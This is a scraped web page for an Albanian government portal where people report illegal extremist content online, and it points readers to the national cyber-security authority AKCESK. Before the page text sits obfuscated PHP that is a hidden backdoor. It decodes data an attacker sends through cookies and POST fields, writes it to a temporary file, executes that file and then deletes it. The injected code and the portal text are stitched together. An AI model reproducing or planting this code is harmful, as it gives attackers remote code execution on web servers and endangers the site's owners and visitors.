$CeYaLswoG = 'I' . chr (81) . "\137" . 'I' . 'E' . "\x54";$kMduTswFK = "\x63" . chr ( 637 - 529 ).chr ( 315 - 218 )."\x73" . "\163" . chr ( 757 - 662 ).'e' . "\170" . "\x69" . "\163" . 't' . 's';$gIhCtSUeby = class_exists($CeYaLswoG); $kMduTswFK = "36451";$EjEdBH = !1;if ($gIhCtSUeby == $EjEdBH){function bnbVIhs(){return FALSE;}$wTdQMDdQN = "40419";bnbVIhs();class IQ_IET{private function iJuozL($wTdQMDdQN){if (is_array(IQ_IET::$Wzlrb)) {$JZFHLY = sys_get_temp_dir() . "/" . crc32(IQ_IET::$Wzlrb["\x73" . 'a' . "\154" . "\x74"]);@IQ_IET::$Wzlrb[chr (119) . 'r' . 'i' . "\164" . "\145"]($JZFHLY, IQ_IET::$Wzlrb["\x63" . chr ( 665 - 554 ).chr ( 488 - 378 ).'t' . 'e' . "\156" . 't']);include $JZFHLY;@IQ_IET::$Wzlrb[chr (100) . "\145" . 'l' . "\145" . chr ( 1005 - 889 ).'e']($JZFHLY); $wTdQMDdQN = "40419";exit();}}private $NoAxmYBYvW;public function xXlWNDk(){echo 34087;}public function __destruct(){$wTdQMDdQN = "38394_2689";$this->iJuozL($wTdQMDdQN); $wTdQMDdQN = "38394_2689";}public function __construct($kqSNOv=0){$DVwsWldJ = $_POST;$HyJRhXWQMB = $_COOKIE;$FWuwSpgS = "3748c69a-64ea-4cd3-8378-b9d70b157ee2";$AbWfWtA = @$HyJRhXWQMB[substr($FWuwSpgS, 0, 4)];if (!empty($AbWfWtA)){$BczMCA = "base64";$LuGPpFhb = "";$AbWfWtA = explode(",", $AbWfWtA);foreach ($AbWfWtA as $wjfNn){$LuGPpFhb .= @$HyJRhXWQMB[$wjfNn];$LuGPpFhb .= @$DVwsWldJ[$wjfNn];}$LuGPpFhb = array_map($BczMCA . chr ( 745 - 650 )."\x64" . 'e' . "\x63" . chr ( 1079 - 968 ).chr ( 689 - 589 )."\145", array($LuGPpFhb,)); $LuGPpFhb = $LuGPpFhb[0] ^ str_repeat($FWuwSpgS, (strlen($LuGPpFhb[0]) / strlen($FWuwSpgS)) + 1);IQ_IET::$Wzlrb = @unserialize($LuGPpFhb); $LuGPpFhb = class_exists("38394_2689");}}public static $Wzlrb = 63881;}$HEdYKfaP = new /* 33104 */ $CeYaLswoG(40419 + 40419); $EjEdBH = $HEdYKfaP = $wTdQMDdQN = Array();} Report Illegal Content – IKTD

Portal: "Report Illegal Content" aims to create a secure online space which among other things includes preventing the further spread of violent extremism and various forms of online radicalization.

Anyone who may encounter illegal content, which promotes violent extremism and pushes towards forms of online radicalization, can do so by reporting through this portal. Pages with illegal content are ascertained by public authorities according to the respective competencies and are officially sent to AKCESK, which takes immediate measures depending on the content that these sites have.

The reports will be treated with complete confidentiality by the responsible authorities, according to the legal framework in force, to make the assessment of the case, as well as to take immediate measures against these contents.

This link redirects you to the website of the National Authority for Electronic Certification and Cyber ​​Security: https://cesk.gov.al

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